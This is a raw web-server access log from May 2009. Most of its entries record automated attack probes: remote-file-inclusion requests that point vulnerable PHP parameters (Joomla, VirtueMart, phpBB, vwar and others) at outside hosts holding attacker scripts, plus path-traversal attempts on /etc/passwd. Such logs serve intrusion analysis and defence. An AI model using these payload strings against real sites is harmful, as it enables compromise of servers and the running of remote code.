202.89.33.167 - - [13/May/2009:05:54:22 -0400] "GET /logs/access_log.Q108103100%20%20//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:54:54 -0400] "GET /logs/access_log.Q109010300%20%20//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:05:55:04 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.92.50 - - [13/May/2009:05:55:18 -0400] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=../../../../../../../../etc/passwd HTTP/1.0" 404 244 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:55:18 -0400] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=../../../../../../../../etc/passwd HTTP/1.0" 404 239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:55:18 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.rabika.ru/hk? HTTP/1.0" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:55:18 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.rabika.ru/hk? HTTP/1.0" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
72.30.79.49 - - [13/May/2009:05:55:04 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.135.14 - - [13/May/2009:05:55:54 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
193.221.119.126 - - [13/May/2009:05:56:20 -0400] "GET /logs/access_log.Q108120700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:56:21 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:56:21 -0400] "GET /logs/access_log.Q108103100//?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:56:21 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:56:40 -0400] "GET /logs/access_log.Q109010300//?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.55.156.2 - - [13/May/2009:05:56:42 -0400] "GET /logs/access_log.Q108110900/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:05:56:42 -0400] "GET /errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:05:56:42 -0400] "GET /logs/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
209.59.12.99 - - [13/May/2009:05:56:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.221.119.126 - - [13/May/2009:05:57:09 -0400] "GET /logs/access_log.Q109011400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:05:57:26 -0400] "GET /logs/access_log.Q108120700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:57:26 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:05:57:26 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
193.221.119.126 - - [13/May/2009:05:57:54 -0400] "GET /logs/access_log.Q109032800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:57:58 -0400] "GET /logs/access_log.Q108103100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.72.114 - - [13/May/2009:05:58:07 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [13/May/2009:05:58:07 -0400] "GET /logs/access_log.Q108082800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.89.33.167 - - [13/May/2009:05:58:11 -0400] "GET /logs/access_log.Q109010300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.55.156.2 - - [13/May/2009:05:59:08 -0400] "GET /logs/access_log.Q108092900//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:05:59:08 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:05:59:09 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.820"
123.125.64.38 - - [13/May/2009:06:02:54 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
58.227.193.198 - - [13/May/2009:06:04:32 -0400] "GET /logs/access_log.Q109011400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:06:04:35 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:04:35 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:04:35 -0400] "GET /logs/access_log.Q108082700//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:04:35 -0400] "GET /logs/access_log.Q108072400//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.59.12.99 - - [13/May/2009:06:05:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.159.29 - - [13/May/2009:06:05:18 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.101.159.29 - - [13/May/2009:06:05:19 -0400] "GET /errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.101.159.29 - - [13/May/2009:06:05:19 -0400] "GET /logs/errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.101.159.29 - - [13/May/2009:06:05:28 -0400] "GET /logs/access_log.Q108082800/errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
121.101.159.29 - - [13/May/2009:06:05:29 -0400] "GET /errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
121.101.159.29 - - [13/May/2009:06:05:29 -0400] "GET /logs/errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
202.89.33.167 - - [13/May/2009:06:06:01 -0400] "GET /logs/access_log.Q108100500//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.55.156.2 - - [13/May/2009:06:06:06 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:06:06:06 -0400] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:06:06:07 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 1155 "-" "libwww-perl/5.820"
121.101.159.29 - - [13/May/2009:06:06:26 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.101.159.29 - - [13/May/2009:06:06:43 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
217.18.76.16 - - [13/May/2009:06:06:44 -0400] "GET /logs/access_log.Q109032800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
94.23.54.200 - - [13/May/2009:06:07:07 -0400] "GET /logs/access_log.Q109050200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
124.0.73.2 - - [13/May/2009:06:07:39 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
124.0.73.2 - - [13/May/2009:06:07:39 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.73.2 - - [13/May/2009:06:07:40 -0400] "GET /logs/access_log.Q109022600//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.83.196 - - [13/May/2009:06:07:42 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:07:43 -0400] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:07:43 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 1155 "-" "libwww-perl/5.69"
217.18.76.16 - - [13/May/2009:06:09:31 -0400] "GET /logs/access_log.Q108061500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:06:09:31 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:06:09:31 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
88.84.128.40 - - [13/May/2009:06:09:31 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:06:09:31 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
58.227.193.198 - - [13/May/2009:06:09:33 -0400] "GET /logs/access_log.Q108120400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.84.128.40 - - [13/May/2009:06:09:33 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
217.18.76.16 - - [13/May/2009:06:09:54 -0400] "GET /logs/access_log.Q108061000//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/May/2009:06:09:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.234.41.5 - - [13/May/2009:06:10:14 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:10:14 -0400] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:10:14 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 1155 "-" "libwww-perl/5.79"
72.30.79.49 - - [13/May/2009:06:10:22 -0400] "GET /logs/access_log.Q108080700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [13/May/2009:06:10:23 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:23 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:23 -0400] "GET /logs/access_log.Q108060900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:23 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:25 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:28 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:28 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:28 -0400] "GET /logs/access_log.Q108060900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:28 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:29 -0400] "GET /logs/access_log.Q108060900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:29 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:10:29 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.55.156.2 - - [13/May/2009:06:10:36 -0400] "GET /logs/access_log.Q109012500//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:06:10:57 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:06:10:58 -0400] "GET //update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:06:10:58 -0400] "GET /logs//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.820"
85.214.83.196 - - [13/May/2009:06:11:03 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:11:04 -0400] "GET //update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:11:04 -0400] "GET /logs//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.69"
202.89.33.167 - - [13/May/2009:06:11:17 -0400] "GET /logs/access_log.Q108100500//?_SERVER[DOCUMENT_ROOT]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.94.30.156 - - [13/May/2009:06:11:33 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:06:11:33 -0400] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:06:11:33 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 1155 "-" "libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:06:11:48 -0400] "GET /logs/access_log.Q108100500//?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.237.82.158 - - [13/May/2009:06:11:55 -0400] "GET /logs/access_log.Q108112900%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:06:11:57 -0400] "GET /logs/access_log.Q108122800%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.814"
121.165.73.157 - - [13/May/2009:06:11:57 -0400] "GET /logs/access_log.Q109022600//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:11:57 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:11:58 -0400] "GET /logs/access_log.Q108112900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:11:58 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
69.237.82.158 - - [13/May/2009:06:11:58 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:06:11:58 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.814"
123.143.98.5 - - [13/May/2009:06:12:06 -0400] "GET /logs/access_log.Q108060900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:12:06 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:12:11 -0400] "GET /logs/access_log.Q108060900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:12:11 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:12:17 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:12:17 -0400] "GET /logs/access_log.Q108060900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.117.191.71 - - [13/May/2009:06:12:19 -0400] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:06:12:19 -0400] "GET //vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.65"
213.207.110.102 - - [13/May/2009:06:12:31 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.agrippine.net/components/com/image?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
85.214.83.196 - - [13/May/2009:06:12:53 -0400] "GET /logs/access_log.Q109012500//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.69"
84.201.208.50 - - [13/May/2009:06:12:59 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.201.208.50 - - [13/May/2009:06:12:59 -0400] "GET /logs/access_log.Q108121300//components/com_smf/smf.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.201.208.50 - - [13/May/2009:06:13:04 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.237.82.158 - - [13/May/2009:06:13:20 -0400] "GET /logs/access_log.Q109022600//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:06:13:24 -0400] "GET /logs/access_log.Q108112900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.814"
74.55.156.2 - - [13/May/2009:06:13:35 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.820"
